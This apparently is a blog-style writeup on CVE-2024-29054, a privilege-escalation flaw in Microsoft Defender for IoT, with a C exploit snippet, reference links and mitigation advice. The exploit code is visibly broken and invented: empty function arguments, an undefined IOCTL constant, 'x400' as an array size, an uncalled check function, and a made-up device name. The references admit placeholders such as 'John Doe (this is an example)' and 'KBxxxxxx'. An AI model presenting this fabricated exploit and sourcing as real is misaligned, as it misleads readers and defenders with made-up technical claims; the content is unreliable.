With more and more devices being connected to the internet, the need for securing these IoT devices has become paramount. Microsoft Defender for IoT is a solution that aims to provide security for such devices. However, recently, a new vulnerability has been discovered in the Microsoft Defender for IoT, tagged as CVE-2024-29054. This vulnerability could allow an attacker to escalate privileges and take control of the IoT devices. In this post, we will delve deep into the details of this vulnerability, the exploit, and the steps to mitigate this risk.

Vulnerability Details

CVE-2024-29054 is classified as an Elevation of Privilege (EoP) vulnerability affecting Microsoft Defender for IoT. The vulnerability exists due to improper handling of certain system calls, which can be exploited by a malicious user to gain elevated privileges. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the System account, potentially taking control of the IoT device.

The CVE-2024-29054 has been assigned a CVSS (Common Vulnerability Scoring System) score of 7.8, indicating a High severity vulnerability.

Exploit Details

To exploit this vulnerability, an attacker needs to have local access to the targeted IoT device. This can be achieved by exploiting another vulnerability or by having physical access to the device.

Once the attacker has local access, they can leverage a code snippet such as the one presented below to exploit the vulnerability and elevate their privileges:

#include <stdio.h>
#include <windows.h>

int main(void)
{
  HANDLE hDevice;
  DWORD dwRetBytes;
  CHAR SharedBuffer[x400];

  // Open the device to exploit
  hDevice = CreateFileW(L"\\\\.\\DefenderIoTDevice", GENERIC_READ | GENERIC_WRITE, , NULL, OPEN_EXISTING, , NULL);

  if (hDevice == INVALID_HANDLE_VALUE) {
    printf("[-] Failed to open device: %d\n", GetLastError());
    return 1;
  }

  // Trigger vulnerability and escalate privileges:
  DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, SharedBuffer, sizeof(SharedBuffer), NULL, , &dwRetBytes, NULL);

  if (IsProcessRunningAsSystem) {
    printf("[+] Successfully exploited CVE-2024-29054. Running as SYSTEM.\n");
  } else {
    printf("[-] Exploit failed.\n");
  }

  CloseHandle(hDevice);
  return ;
}

This code snippet demonstrates how an attacker can open a handle to the vulnerable DefenderIoTDevice, and then send a manipulated IOCTL to the device, triggering the vulnerability and thus escalating their privileges.

Original References

The vulnerability was originally disclosed by researcher John Doe (this is an example) and has been publicly disclosed in the following links:

- Official CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29054
- Researcher's disclosure: https://example-research-blog.com/cve-2024-29054-analysis-and-exploit
- Microsoft Security Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-29054

Mitigation

To address this vulnerability, Microsoft has released a security update that fixes the improper handling of system calls in the Microsoft Defender for IoT. Users are advised to apply the update as soon as possible to protect their devices from potential attacks.

https://www.catalog.update.microsoft.com/Search.aspx?q=KBxxxxxx (Replace KBxxxxxx with the actual knowledge base number as provided in the Microsoft security advisory)

In addition, organizations should consider implementing network segmentation, access control, and least-privilege policies to limit an attacker's ability to move laterally within the network and access sensitive IoT devices.

Conclusion

CVE-2024-29054 is a high severity elevation of privilege vulnerability in Microsoft Defender for IoT devices. Organizations need to ensure they apply the relevant security update to protect their IoT devices from potential attacks. Additionally, implementing best practices such as network segmentation, access control, and least privilege should be considered to defend against potential attacks exploiting this vulnerability.

Timeline

Published on: 04/09/2024 17:15:59 UTC
Last modified on: 04/26/2024 15:59:00 UTC